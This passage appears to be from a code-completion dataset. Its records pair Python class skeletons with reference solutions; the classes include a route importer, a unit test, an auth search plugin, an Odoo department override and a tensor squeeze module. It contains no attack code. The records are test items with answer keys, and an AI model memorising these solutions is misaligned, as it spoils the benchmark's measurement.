request): Submit imported data :param request: :return:\n\n<|skeleton|>\nclass RouteImportAppplication:\n \"\"\"Route import application\"\"\"\n\n def render_result(self, request, result):\n \"\"\"Display form with imported data :param request: :param result: :return:\"\"\"\n <|body_0|>\n\n def view_submit(self, request):\n \"\"\"Submit imported data :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n initial = []\n for prefix in result:\n description, objects = result[prefix]\n initial += [{'prefix': prefix, 'description': description, 'objects': ', '.join(objects)}]\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(initial=initial)\n return self.render(request, 'found.html', formset=formset)\n<|end_body_0|>\n\n<|body_start_1|>\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(request.POST)\n c = 0\n if formset.is_valid():\n vrf = VRF.get_global()\n asn = AS.default_as()\n for form in formset.forms:\n if 'DELETE' in form.cleaned_data and form.cleaned_data['DELETE']:\n continue\n try:\n prefix = IP.prefix(form.cleaned_data['prefix'])\n except AttributeError:\n continue\n description = form.cleaned_data['description']\n p, created = Prefix.objects.get_or_create(vrf=vrf, afi=prefix.afi, prefix=prefix.normalized.prefix, defaults={'asn': asn, 'description': description})\n if created:\n c += 1\n self.message_user(request, '%d prefixes are imported' % c)\n return self.response_redirect('ip:ipam:index')\n<|end_body_1|>\n", "revision_id": "2ab0ab7718bb7116da2c3953efd466757e11d9ce", "skeleton": "<|skeleton|>\nclass RouteImportAppplication:\n \"\"\"Route import application\"\"\"\n\n def render_result(self, request, result):\n \"\"\"Display form with imported data :param request: :param result: :return:\"\"\"\n <|body_0|>\n\n def view_submit(self, request):\n \"\"\"Submit imported data :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RouteImportAppplication:\n \"\"\"Route import application\"\"\"\n\n def render_result(self, request, result):\n \"\"\"Display form with imported data :param request: :param result: :return:\"\"\"\n initial = []\n for prefix in result:\n description, objects = result[prefix]\n initial += [{'prefix': prefix, 'description': description, 'objects': ', '.join(objects)}]\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(initial=initial)\n return self.render(request, 'found.html', formset=formset)\n\n def view_submit(self, request):\n \"\"\"Submit imported data :param request: :return:\"\"\"\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(request.POST)\n c = 0\n if formset.is_valid():\n vrf = VRF.get_global()\n asn = AS.default_as()\n for form in formset.forms:\n if 'DELETE' in form.cleaned_data and form.cleaned_data['DELETE']:\n continue\n try:\n prefix = IP.prefix(form.cleaned_data['prefix'])\n except AttributeError:\n continue\n description = form.cleaned_data['description']\n p, created = Prefix.objects.get_or_create(vrf=vrf, afi=prefix.afi, prefix=prefix.normalized.prefix, defaults={'asn': asn, 'description': description})\n if created:\n c += 1\n self.message_user(request, '%d prefixes are imported' % c)\n return 
self.response_redirect('ip:ipam:index')\n", "source": "the_stack_v2_python_sparse", "source_path": "ip/apps/routeimport/views.py", "source_repo": "DreamerDDL/noc", "split": "test", "star_events_count": 0} {"blob_id": "b345a1dcc97a3f503fb4caee618f96f2578beac1", "bodies": ["sigma = 1.0\nsize = 5\nreal_values = 0.3678 * np.array([0.1357, 0.565, 1.266, 0.565, 0.1357])\nfor real, computed in zip(real_values, utils.discrete_gaussian(size, sigma)):\n self.assertAlmostEqual(real, computed, 3)", "sigma = 1.0\nsize = 6\nwith self.assertRaisesRegex(ValueError, '`size` must be odd.'):\n utils.discrete_gaussian(size, sigma)"], "bodies_text": "<|body_start_0|>\n sigma = 1.0\n size = 5\n real_values = 0.3678 * np.array([0.1357, 0.565, 1.266, 0.565, 0.1357])\n for real, computed in zip(real_values, utils.discrete_gaussian(size, sigma)):\n self.assertAlmostEqual(real, computed, 3)\n<|end_body_0|>\n\n<|body_start_1|>\n sigma = 1.0\n size = 6\n with self.assertRaisesRegex(ValueError, '`size` must be odd.'):\n utils.discrete_gaussian(size, sigma)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "utilsTest", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass utilsTest:\n\n def testDiscreteGaussian(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_0|>\n\n def testDiscreteGaussianBadSize(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sigma = 1.0\n size = 5\n real_values = 0.3678 * np.array([0.1357, 0.565, 1.266, 0.565, 0.1357])\n for real, computed in zip(real_values, utils.discrete_gaussian(size, sigma)):\n self.assertAlmostEqual(real, computed, 3)\n<|end_body_0|>\n\n<|body_start_1|>\n sigma = 1.0\n size = 6\n with self.assertRaisesRegex(ValueError, '`size` must be odd.'):\n utils.discrete_gaussian(size, sigma)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000205", "length_bytes": 833, "license_type": "no_license", "methods": [{"docstring": "Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`", "name": "testDiscreteGaussian", "signature": "def testDiscreteGaussian(self)"}, {"docstring": "Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`", "name": "testDiscreteGaussianBadSize", "signature": "def testDiscreteGaussianBadSize(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004807", "prompt": "Implement the Python class `utilsTest` described below.\n\nClass description:\nImplement the utilsTest class.\n\nMethod signatures and docstrings:\n- def testDiscreteGaussian(self): Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\n- def testDiscreteGaussianBadSize(self): Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`", "prompted_full_text": "Implement the Python class `utilsTest` described below.\n\nClass description:\nImplement the utilsTest class.\n\nMethod signatures and docstrings:\n- def testDiscreteGaussian(self): Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\n- def testDiscreteGaussianBadSize(self): Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\n\n<|skeleton|>\nclass utilsTest:\n\n def testDiscreteGaussian(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n 
<|body_0|>\n\n def testDiscreteGaussianBadSize(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sigma = 1.0\n size = 5\n real_values = 0.3678 * np.array([0.1357, 0.565, 1.266, 0.565, 0.1357])\n for real, computed in zip(real_values, utils.discrete_gaussian(size, sigma)):\n self.assertAlmostEqual(real, computed, 3)\n<|end_body_0|>\n\n<|body_start_1|>\n sigma = 1.0\n size = 6\n with self.assertRaisesRegex(ValueError, '`size` must be odd.'):\n utils.discrete_gaussian(size, sigma)\n<|end_body_1|>\n", "revision_id": "39598b528fec061e828f64a3ded35aebeacb442e", "skeleton": "<|skeleton|>\nclass utilsTest:\n\n def testDiscreteGaussian(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_0|>\n\n def testDiscreteGaussianBadSize(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class utilsTest:\n def testDiscreteGaussian(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n sigma = 1.0\n size = 5\n real_values = 0.3678 * np.array([0.1357, 0.565, 1.266, 0.565, 0.1357])\n for real, computed in zip(real_values, utils.discrete_gaussian(size, sigma)):\n self.assertAlmostEqual(real, computed, 3)\n\n def testDiscreteGaussianBadSize(self):\n \"\"\"Tests versus values computed using `https://keisan.casio.com/exec/system/1180573473`\"\"\"\n sigma = 1.0\n size = 6\n with self.assertRaisesRegex(ValueError, '`size` must be odd.'):\n utils.discrete_gaussian(size, sigma)\n", "source": "the_stack_v2_python_sparse", "source_path": "simulation/utils_test.py", "source_repo": "chulab/super_resolution", "split": "test", "star_events_count": 3} {"blob_id": "551069db97d0a25bc911126cef3481d39bf1fccb", "bodies": ["self.id = id\nself.title = title\nself.delegate = delegate_path", "uf = getattr(aq_base(self), 'acl_users', None)\nif uf is None and self.delegate:\n uf = self.unrestrictedTraverse(self.delegate)\nreturn uf", "acl = self._getDelegate()\nif acl is None:\n return ()\nreturn acl.searchUsers(id=id, login=login, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)", "acl = self._getDelegate()\nif acl is None:\n return ()\nreturn acl.searchGroups(id=id, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)"], "bodies_text": "<|body_start_0|>\n self.id = id\n self.title = title\n self.delegate = delegate_path\n<|end_body_0|>\n\n<|body_start_1|>\n uf = getattr(aq_base(self), 'acl_users', None)\n if uf is None and self.delegate:\n uf = self.unrestrictedTraverse(self.delegate)\n return uf\n<|end_body_1|>\n\n<|body_start_2|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchUsers(id=id, login=login, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_2|>\n\n<|body_start_3|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchGroups(id=id, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_3|>\n", "class_docstring": "SearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object", "class_name": "SearchPrincipalsPlugin", "detected_licenses": ["ZPL-2.1"], "format_version": 
"stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SearchPrincipalsPlugin:\n \"\"\"SearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\"\"\"\n\n def __init__(self, id, title='', delegate_path=''):\n \"\"\"Initialize a new instance\"\"\"\n <|body_0|>\n\n def _getDelegate(self):\n \"\"\"Safely retrieve a PluggableAuthService to work with\"\"\"\n <|body_1|>\n\n def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IUserEnumerationPlugin\"\"\"\n <|body_2|>\n\n def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IGroupEnumerationPlugin\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.id = id\n self.title = title\n self.delegate = delegate_path\n<|end_body_0|>\n\n<|body_start_1|>\n uf = getattr(aq_base(self), 'acl_users', None)\n if uf is None and self.delegate:\n uf = self.unrestrictedTraverse(self.delegate)\n return uf\n<|end_body_1|>\n\n<|body_start_2|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchUsers(id=id, login=login, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_2|>\n\n<|body_start_3|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchGroups(id=id, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000206", "length_bytes": 3727, "license_type": "permissive", "methods": [{"docstring": "Initialize a new instance", "name": "__init__", "signature": "def __init__(self, id, title='', delegate_path='')"}, {"docstring": "Safely retrieve a PluggableAuthService to work with", "name": "_getDelegate", "signature": "def _getDelegate(self)"}, {"docstring": "see IUserEnumerationPlugin", "name": "enumerateUsers", "signature": "def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw)"}, {"docstring": "see IGroupEnumerationPlugin", "name": "enumerateGroups", "signature": "def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_000605", "prompt": "Implement the Python class `SearchPrincipalsPlugin` described below.\n\nClass description:\nSearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\n\nMethod signatures and docstrings:\n- def __init__(self, id, title='', delegate_path=''): Initialize a new instance\n- def _getDelegate(self): Safely retrieve a PluggableAuthService to work with\n- def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw): see IUserEnumerationPlugin\n- def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw): see IGroupEnumerationPlugin", "prompted_full_text": "Implement the Python class `SearchPrincipalsPlugin` described below.\n\nClass description:\nSearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\n\nMethod signatures and docstrings:\n- def __init__(self, id, title='', delegate_path=''): Initialize a new instance\n- def _getDelegate(self): Safely retrieve a PluggableAuthService to work with\n- def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw): see IUserEnumerationPlugin\n- def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, 
**kw): see IGroupEnumerationPlugin\n\n<|skeleton|>\nclass SearchPrincipalsPlugin:\n \"\"\"SearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\"\"\"\n\n def __init__(self, id, title='', delegate_path=''):\n \"\"\"Initialize a new instance\"\"\"\n <|body_0|>\n\n def _getDelegate(self):\n \"\"\"Safely retrieve a PluggableAuthService to work with\"\"\"\n <|body_1|>\n\n def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IUserEnumerationPlugin\"\"\"\n <|body_2|>\n\n def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IGroupEnumerationPlugin\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.id = id\n self.title = title\n self.delegate = delegate_path\n<|end_body_0|>\n\n<|body_start_1|>\n uf = getattr(aq_base(self), 'acl_users', None)\n if uf is None and self.delegate:\n uf = self.unrestrictedTraverse(self.delegate)\n return uf\n<|end_body_1|>\n\n<|body_start_2|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchUsers(id=id, login=login, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_2|>\n\n<|body_start_3|>\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchGroups(id=id, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n<|end_body_3|>\n", "revision_id": "f0fde29f4c865a4e0908d22c19a0a72810b0a24f", "skeleton": "<|skeleton|>\nclass SearchPrincipalsPlugin:\n \"\"\"SearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\"\"\"\n\n def __init__(self, id, title='', delegate_path=''):\n \"\"\"Initialize a new instance\"\"\"\n <|body_0|>\n\n def _getDelegate(self):\n \"\"\"Safely retrieve a PluggableAuthService to work with\"\"\"\n <|body_1|>\n\n def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IUserEnumerationPlugin\"\"\"\n <|body_2|>\n\n def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IGroupEnumerationPlugin\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SearchPrincipalsPlugin:\n \"\"\"SearchPrincipalsPlugin delegates its enumerateUsers and enumerateGroups methods to a delegate object\"\"\"\n\n def __init__(self, id, title='', delegate_path=''):\n \"\"\"Initialize a new instance\"\"\"\n self.id = id\n self.title = title\n self.delegate = delegate_path\n\n def _getDelegate(self):\n \"\"\"Safely retrieve a PluggableAuthService to work with\"\"\"\n uf = getattr(aq_base(self), 'acl_users', None)\n if uf is None and self.delegate:\n uf = self.unrestrictedTraverse(self.delegate)\n return uf\n\n def enumerateUsers(self, id=None, login=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IUserEnumerationPlugin\"\"\"\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchUsers(id=id, login=login, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n\n def enumerateGroups(self, id=None, exact_match=0, sort_by=None, max_results=None, **kw):\n \"\"\"see IGroupEnumerationPlugin\"\"\"\n acl = self._getDelegate()\n if acl is None:\n return ()\n return acl.searchGroups(id=id, exact_match=exact_match, sort_by=sort_by, max_results=max_results, **kw)\n", "source": "the_stack_v2_python_sparse", 
"source_path": "src/Products/PluggableAuthService/plugins/SearchPrincipalsPlugin.py", "source_repo": "zopefoundation/Products.PluggableAuthService", "split": "test", "star_events_count": 8} {"blob_id": "32ac3e836e2b4ebc1cd375581b35c9db3bbc99d2", "bodies": ["ana_id = super(hr_department, self).create(vals)\nif self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\nreturn ana_id", "ana_id = super(hr_department, self).write(vals)\nif self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\nreturn ana_id"], "bodies_text": "<|body_start_0|>\n ana_id = super(hr_department, self).create(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_0|>\n\n<|body_start_1|>\n ana_id = super(hr_department, self).write(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_1|>\n", "class_docstring": "", "class_name": "hr_department", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass hr_department:\n\n def create(self, vals):\n \"\"\"override create function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_0|>\n\n def write(self, vals):\n \"\"\"override write function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ana_id = super(hr_department, self).create(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_0|>\n\n<|body_start_1|>\n ana_id = super(hr_department, self).write(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000207", "length_bytes": 1664, "license_type": "no_license", "methods": [{"docstring": "override create function to set responsible of department's analytic account equals to department's manager", "name": "create", "signature": "def create(self, vals)"}, {"docstring": "override write function to set responsible of department's analytic account equals to department's manager", "name": "write", "signature": "def write(self, vals)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000124", "prompt": "Implement the Python class `hr_department` described below.\n\nClass description:\nImplement the hr_department class.\n\nMethod signatures and docstrings:\n- def create(self, vals): override create function to set responsible of department's analytic account equals to department's manager\n- def write(self, vals): override write function to set responsible of department's analytic account equals to department's manager", "prompted_full_text": "Implement the Python class `hr_department` described below.\n\nClass description:\nImplement the hr_department class.\n\nMethod signatures and docstrings:\n- def create(self, vals): override create function to set responsible of department's analytic account equals to department's manager\n- def 
write(self, vals): override write function to set responsible of department's analytic account equals to department's manager\n\n<|skeleton|>\nclass hr_department:\n\n def create(self, vals):\n \"\"\"override create function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_0|>\n\n def write(self, vals):\n \"\"\"override write function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ana_id = super(hr_department, self).create(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_0|>\n\n<|body_start_1|>\n ana_id = super(hr_department, self).write(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_1|>\n", "revision_id": "0b997095c260d58b026440967fea3a202bef7efb", "skeleton": "<|skeleton|>\nclass hr_department:\n\n def create(self, vals):\n \"\"\"override create function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_0|>\n\n def write(self, vals):\n \"\"\"override write function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class hr_department:\n def create(self, vals):\n \"\"\"override create function to set responsible of department's analytic account equals to department's manager\"\"\"\n ana_id = super(hr_department, self).create(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n\n def write(self, vals):\n \"\"\"override write function to set responsible of department's analytic account equals to department's manager\"\"\"\n ana_id = super(hr_department, self).write(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n", "source": "the_stack_v2_python_sparse", "source_path": "v_11/EBS-SVN/branches/common/hr_department_custom/models/hr_department.py", "source_repo": "musabahmed/baba", "split": "test", "star_events_count": 0} {"blob_id": "8bbf99349863bc26c0a81f7d18978a15d112189f", "bodies": ["input_stream_ids = {f'input_{idx}': ik for idx, ik in enumerate(input_stream_keys)}\nassert 'dim' in config, \"SqueezeModule relies on 'dim' value.\\n Not found in config.\"\nsuper(SqueezeModule, self).__init__(id=id, type='SqueezeModule', config=config, input_stream_ids=input_stream_ids)\nself.squeeze_dim = self.config['dim']\nassert isinstance(self.squeeze_dim, list)\nself.n_input_streams = len(self.input_stream_ids)\nwhile len(self.squeeze_dim) < self.n_input_streams:\n self.squeeze_dim.append(self.squeeze_dim[-1])", "outputs_stream_dict = {}\nfor idx, (k, inp) in enumerate(input_streams_dict.items()):\n if self.squeeze_dim[idx] is not None:\n n_inp = inp.squeeze(dim=self.squeeze_dim[idx])\n else:\n n_inp = inp.squeeze()\n outputs_stream_dict[f'output_{idx}'] = n_inp\nreturn outputs_stream_dict"], "bodies_text": "<|body_start_0|>\n input_stream_ids = {f'input_{idx}': ik for idx, ik in enumerate(input_stream_keys)}\n assert 
'dim' in config, \"SqueezeModule relies on 'dim' value.\\n Not found in config.\"\n super(SqueezeModule, self).__init__(id=id, type='SqueezeModule', config=config, input_stream_ids=input_stream_ids)\n self.squeeze_dim = self.config['dim']\n assert isinstance(self.squeeze_dim, list)\n self.n_input_streams = len(self.input_stream_ids)\n while len(self.squeeze_dim) < self.n_input_streams:\n self.squeeze_dim.append(self.squeeze_dim[-1])\n<|end_body_0|>\n\n<|body_start_1|>\n outputs_stream_dict = {}\n for idx, (k, inp) in enumerate(input_streams_dict.items()):\n if self.squeeze_dim[idx] is not None:\n n_inp = inp.squeeze(dim=self.squeeze_dim[idx])\n else:\n n_inp = inp.squeeze()\n outputs_stream_dict[f'output_{idx}'] = n_inp\n return outputs_stream_dict\n<|end_body_1|>\n", "class_docstring": "", "class_name": "SqueezeModule", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SqueezeModule:\n\n def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]):\n \"\"\"Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\"\"\"\n <|body_0|>\n\n def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]:\n \"\"\"Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n input_stream_ids = {f'input_{idx}': ik for idx, ik in enumerate(input_stream_keys)}\n assert 'dim' in config, \"SqueezeModule relies on 'dim' value.\\n Not found in config.\"\n super(SqueezeModule, self).__init__(id=id, type='SqueezeModule', config=config, input_stream_ids=input_stream_ids)\n self.squeeze_dim = self.config['dim']\n assert isinstance(self.squeeze_dim, list)\n self.n_input_streams = len(self.input_stream_ids)\n while len(self.squeeze_dim) < self.n_input_streams:\n self.squeeze_dim.append(self.squeeze_dim[-1])\n<|end_body_0|>\n\n<|body_start_1|>\n outputs_stream_dict = {}\n for idx, (k, inp) in enumerate(input_streams_dict.items()):\n if self.squeeze_dim[idx] is not None:\n n_inp = inp.squeeze(dim=self.squeeze_dim[idx])\n else:\n n_inp = inp.squeeze()\n outputs_stream_dict[f'output_{idx}'] = n_inp\n return outputs_stream_dict\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000208", "length_bytes": 2766, "license_type": "permissive", "methods": [{"docstring": "Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.", "name": "__init__", "signature": "def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str])"}, {"docstring": "Operates on inputs_dict that is made up of referents to the available stream. 
Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:", "name": "compute", "signature": "def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001033", "prompt": "Implement the Python class `SqueezeModule` described below.\n\nClass description:\nImplement the SqueezeModule class.\n\nMethod signatures and docstrings:\n- def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]): Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\n- def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]: Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:", "prompted_full_text": "Implement the Python class `SqueezeModule` described below.\n\nClass description:\nImplement the SqueezeModule class.\n\nMethod signatures and docstrings:\n- def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]): Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\n- def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]: Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:\n\n<|skeleton|>\nclass SqueezeModule:\n\n def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]):\n \"\"\"Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\"\"\"\n <|body_0|>\n\n def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]:\n \"\"\"Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. 
:returns: - outputs_stream_dict:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n input_stream_ids = {f'input_{idx}': ik for idx, ik in enumerate(input_stream_keys)}\n assert 'dim' in config, \"SqueezeModule relies on 'dim' value.\\n Not found in config.\"\n super(SqueezeModule, self).__init__(id=id, type='SqueezeModule', config=config, input_stream_ids=input_stream_ids)\n self.squeeze_dim = self.config['dim']\n assert isinstance(self.squeeze_dim, list)\n self.n_input_streams = len(self.input_stream_ids)\n while len(self.squeeze_dim) < self.n_input_streams:\n self.squeeze_dim.append(self.squeeze_dim[-1])\n<|end_body_0|>\n\n<|body_start_1|>\n outputs_stream_dict = {}\n for idx, (k, inp) in enumerate(input_streams_dict.items()):\n if self.squeeze_dim[idx] is not None:\n n_inp = inp.squeeze(dim=self.squeeze_dim[idx])\n else:\n n_inp = inp.squeeze()\n outputs_stream_dict[f'output_{idx}'] = n_inp\n return outputs_stream_dict\n<|end_body_1|>\n", "revision_id": "afe22da2ac20c0d24e93b4dbd1f1ad61374d1a6c", "skeleton": "<|skeleton|>\nclass SqueezeModule:\n\n def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]):\n \"\"\"Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\"\"\"\n <|body_0|>\n\n def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]:\n \"\"\"Operates on 